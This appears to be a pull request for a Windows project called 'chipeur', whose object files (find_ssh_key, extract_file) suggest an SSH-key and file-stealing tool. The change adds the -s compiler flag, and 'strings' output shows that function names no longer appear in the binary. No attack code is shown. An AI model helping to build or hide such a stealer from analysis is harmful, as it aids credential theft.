### PR TITLE
Add -s option into the makefile

### DIFF
--- a/makefile
+++ b/makefile
@@ -7,7 +7,7 @@ OBJ_DIR = obj/
 OBJ_FILES=$(OBJ_DIR)chipeur.o $(OBJ_DIR)find_ssh_key.o $(OBJ_DIR)extract_file.o
 
 CC=x86_64-w64-mingw32-gcc
-CFLAGS=-g -fPIE -O2 -Warray-bounds -Wsequence-point -Walloc-zero -Wnull-dereference \
+CFLAGS=-g -fPIE -O2 -s -Warray-bounds -Wsequence-point -Walloc-zero -Wnull-dereference \
     -Wpointer-arith -Wcast-qual -Wcast-align=strict -I$(INCLUDE_DIR)
 
 #not needed for now


### PR DESCRIPTION
Add the -s option into the compiler flags. From the GCC man : 
> -s  Remove all symbol table and relocation information from the executable.

Right now we still have informations such as function names embedded into the binary, here is the comparison :

Without the -s flag : 
```
chipeur on  feature/add_-s_option [$!] took 2s
🌶️  strings ./chipeur.exe | grep main
Argument domain error (DOMAIN)
__getmainargs
mainret
main
!__main
__getmainargs
6__tmainCRTStartup
;mainCRTStartup
main
__main
__main
mainret
main
__main
__tmainCRTStartup
mainCRTStartup
__native_dllmain_reason
__imp___getmainargs
__getmainargs
```

With the flag : 
```
chipeur on  feature/add_-s_option [$] took 2s
🌶️  strings ./chipeur.exe | grep main
Argument domain error (DOMAIN)
__getmainargs
```

